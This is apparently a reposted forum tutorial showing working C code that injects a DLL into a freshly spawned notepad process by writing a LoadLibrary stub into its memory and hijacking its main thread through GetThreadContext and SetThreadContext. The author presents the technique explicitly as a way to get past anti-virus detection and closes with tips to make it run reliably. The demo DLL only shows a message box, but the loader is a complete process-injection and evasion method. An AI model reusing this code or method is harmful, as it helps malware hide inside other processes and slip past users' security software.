The following is a good article found on the forum today:
From here: http://topic.csdn.net/u/20110218/17/4c366b82-1107-4a2d-ba0d-291c2f62b76f.html
Copying it here for later viewing!!!
At present there are basically two kinds of DLL injection technology on Windows:
1: hooks, SetWindowsHookEx
2: creating a remote thread, CreateRemoteThread
Both can inject a DLL into a remote process, but they have a hard time escaping anti-virus software, CreateRemoteThread in particular: it is generally very easy for anti-virus software to monitor. Here is a neat alternative: have the target process (more precisely, one of its threads) call LoadLibrary itself to load the DLL.
Think about it: on Windows the VC debugger can attach to a running process and debug it, with plenty of power over that process. What does the debugger mechanism consist of? Roughly these steps:
1: OpenProcess() obtains a handle to the target process with debug access (that access is not needed here)
2: SuspendThread() suspends the main thread of the target process
3: GetThreadContext() and SetThreadContext() read and write the current CPU context (the registers, including the instruction pointer EIP) of the target thread
4: ReadProcessMemory() and WriteProcessMemory() read and write the memory of the target process
So which of these serve us? GetThreadContext() and SetThreadContext(): these two API functions are not just friends, they are our best friends :)
The code follows:
1: our own DLL
#include <windows.h>
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    // Very simple: we do not want to damage anything, so all it does is show a message box
    // (only on process attach, otherwise the box would reappear for every new thread).
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
        ::MessageBoxA(0, "!!!", 0, 0);
    return TRUE;
}
2: our main program
typedef HMODULE (__stdcall *PLOADLIBRARY)(LPCSTR lpLibFileName);
void test()
{
    // The path must be built on the stack character by character: a string literal would live in
    // our own .rdata section, and the copied code would then reference an address that does not
    // exist in the target process (access violation there).
    char dllname[] = {'C', ':', '\\', 'd', 'l', 'l', 't', 'e', 's', 't', '.', 'd', 'l', 'l', '\0'};
    // The absolute address of LoadLibraryA, 2088770939 (0x7C801D7B on the author's XP), must be used.
    // Look the value up on your own machine (for example with GetProcAddress); it differs between Windows builds.
    PLOADLIBRARY pfunc = (PLOADLIBRARY)2088770939;
    // Calling through the absolute address works because kernel32.dll is mapped at the same base in
    // every process, so LoadLibraryA sits at the same address in the target as in the injector.
    pfunc(dllname);
    return;
}
// The following is the injection control function.
#include <windows.h>
#include <string.h>
void inject()
{
    CONTEXT context;
    memset(&context, 0, sizeof(context));
    context.ContextFlags = CONTEXT_CONTROL;      // enough for Eip and Esp
    PROCESS_INFORMATION piProcInfo;
    STARTUPINFOA siStartInfo;
    ZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&siStartInfo, sizeof(STARTUPINFOA));
    siStartInfo.cb = sizeof(STARTUPINFOA);
    // CreateProcess may modify the command line buffer, so it must not be a string literal
    char cmdline[] = "C:\\windows\\system32\\notepad.exe";
    BOOL bOk = CreateProcessA(NULL,
        cmdline,                              // command line
        NULL,                                 // process security attributes
        NULL,                                 // primary thread security attributes
        FALSE,                                // handles are not inherited
        0,                                    // creation flags
        NULL,                                 // use parent's environment
        "C:\\windows\\system32\\",            // current directory
        &siStartInfo,                         // STARTUPINFO pointer
        &piProcInfo);                         // receives PROCESS_INFORMATION
    if (!bOk)
        return;
    // Wait until the new process has finished initialising and is sitting in its message loop
    ::WaitForInputIdle(piProcInfo.hProcess, INFINITE);
    // Allocate executable space in the target process
    LPVOID premote = ::VirtualAllocEx(piProcInfo.hProcess, 0, 4096, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    DWORD dwWritten = 0;
    // Copy the test function into the target process (1024 bytes is more than the function needs)
    ::WriteProcessMemory(piProcInfo.hProcess, premote, (LPVOID)test, 1024, &dwWritten);
    // Suspend the main thread of the target process
    ::SuspendThread(piProcInfo.hThread);
    // Read the CPU context of the target thread
    BOOL ok = ::GetThreadContext(piProcInfo.hThread, &context);
    // Push the interrupted Eip onto the thread's stack, so that the "ret" at the end of test()
    // returns to the original code instead of to whatever happened to be on the stack.
    context.Esp -= 4;
    ::WriteProcessMemory(piProcInfo.hProcess, (LPVOID)context.Esp, &context.Eip, sizeof(context.Eip), &dwWritten);
    // Point Eip at the copied test function
    context.Eip = (DWORD)premote;
    // Write the modified CPU context back to the target thread
    ok = ::SetThreadContext(piProcInfo.hThread, &context);
    // Wake the target thread: it now executes our test function first and then
    // continues with its original code sequence.
    ::ResumeThread(piProcInfo.hThread);
    return;
}
The code above has been tested: the DLL is indeed injected, and compared with the other two methods the anti-virus software did not make a sound. It will not be noticed (unless the process's DLL module list is scanned periodically, which would make the system slow).
A few things to check before trying it: build test() without incremental linking (otherwise the symbol test is a jump thunk and the 1024 bytes copied are a table of jumps, not the function), without /GS stack cookies and without any call into the CRT, because the copy must be self-contained code that references nothing in the injector's address space; the technique is 32-bit only as written (Eip, 32-bit CONTEXT); test() clobbers the caller-saved registers EAX, ECX and EDX of the interrupted thread, so for a thread stopped at an arbitrary instruction a robust version saves and restores all registers; and the LoadLibrary address must be taken from the machine the code runs on (GetProcAddress in the injector is the reliable way), since it changes with every build of kernel32.dll.